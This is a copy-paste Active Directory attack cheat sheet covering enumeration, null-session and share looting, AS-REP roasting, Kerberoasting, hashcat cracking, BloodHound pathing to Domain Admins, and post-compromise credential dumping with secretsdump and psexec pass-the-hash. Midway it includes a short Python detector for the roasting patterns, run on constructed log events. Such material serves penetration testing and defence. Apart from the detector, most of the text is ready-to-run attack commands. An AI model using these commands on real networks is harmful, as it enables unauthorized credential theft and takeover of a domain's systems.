A living reference for the AD enumeration loop. Copy-paste ready; swap <DC_IP>, <DOMAIN>, and creds.
Host discovery & fingerprint
nmap -p- --min-rate 2000 -oA nmap/all <DC_IP>
nmap -p 53,88,135,139,389,445,464,636,3268 -sCV -oA nmap/svc <DC_IP>
nxc smb <DC_IP> # hostname + domain + OS
SMB
nxc smb <DC_IP> -u '' -p '' --shares # null session
nxc smb <DC_IP> -u USER -p PASS --shares
nxc smb <DC_IP> -u USER -p PASS --users
nxc smb <DC_IP> -u USER -p PASS -M spider_plus # loot readable shares
LDAP
ldapsearch -x -H ldap://<DC_IP> -b "DC=domain,DC=local" -s base
nxc ldap <DC_IP> -u USER -p PASS --asreproast asrep.hash
nxc ldap <DC_IP> -u USER -p PASS --kerberoasting kerb.hash
Kerberos
# AS-REP roast (no creds needed if you have a userlist)
impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile users.txt -no-pass
# Kerberoast (creds needed)
impacket-GetUserSPNs <DOMAIN>/USER:PASS -dc-ip <DC_IP> -request
# Crack
hashcat -m 18200 asrep.hash rockyou.txt # AS-REP
hashcat -m 13100 kerb.hash rockyou.txt # TGS / Kerberoast
BloodHound
bloodhound-python -u USER -p PASS -d <DOMAIN> -ns <DC_IP> -c All --zip
Then in the UI: mark owned → Shortest Path to Domain Admins → DCSync Rights.
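A detection-side check for the AS-REP roast and Kerberoast steps above, added here and not part of the original sheet. It walks constructed Windows Security event records for IDs 4768 and 4769 (field names follow the event schema, the values are made up) and flags accounts requested without pre-authentication and clients pulling RC4 service tickets for several SPNs.

```python
"""Flag the two Kerberos request patterns the roasting steps above produce.

EVENTS is a constructed sample of parsed Windows Security log fields
(event IDs 4768/4769); field names follow the event schema, values are made up.
"""
from collections import defaultdict

RC4_HMAC = "0x17"  # roasting tools request RC4 so the hash cracks with -m 18200 / -m 13100

EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "MSSQLSvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "http_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.21"},
]


def asrep_candidates(events):
    """4768 with Pre-Authentication Type 0: the account has 'Do not require
    Kerberos preauthentication' set, which is what GetNPUsers harvests."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0"]


def kerberoast_sources(events, threshold=2):
    """Clients that requested RC4 service tickets for several distinct
    non-machine SPNs. krbtgt and computer accounts (trailing $) are skipped
    and a single request is allowed, since both occur in normal traffic."""
    per_client = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        per_client[e["IpAddress"]].add(svc)
    return {ip: sorted(s) for ip, s in per_client.items() if len(s) >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable accounts requested:", asrep_candidates(EVENTS))
    print("Possible Kerberoasting clients:", kerberoast_sources(EVENTS))
```

Tune the threshold and the RC4 filter to the estate; a domain that still allows RC4 will produce 0x17 service tickets in legitimate traffic.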
Post-compromise
impacket-secretsdump <DOMAIN>/USER:PASS@<DC_IP> # creds/PtH
impacket-psexec -hashes :NTLM <DOMAIN>/administrator@<DC_IP>
Sync your clock before any Kerberos op: sudo ntpdate <DC_IP>. A skew of more than 5 minutes fails with KRB_AP_ERR_SKEW.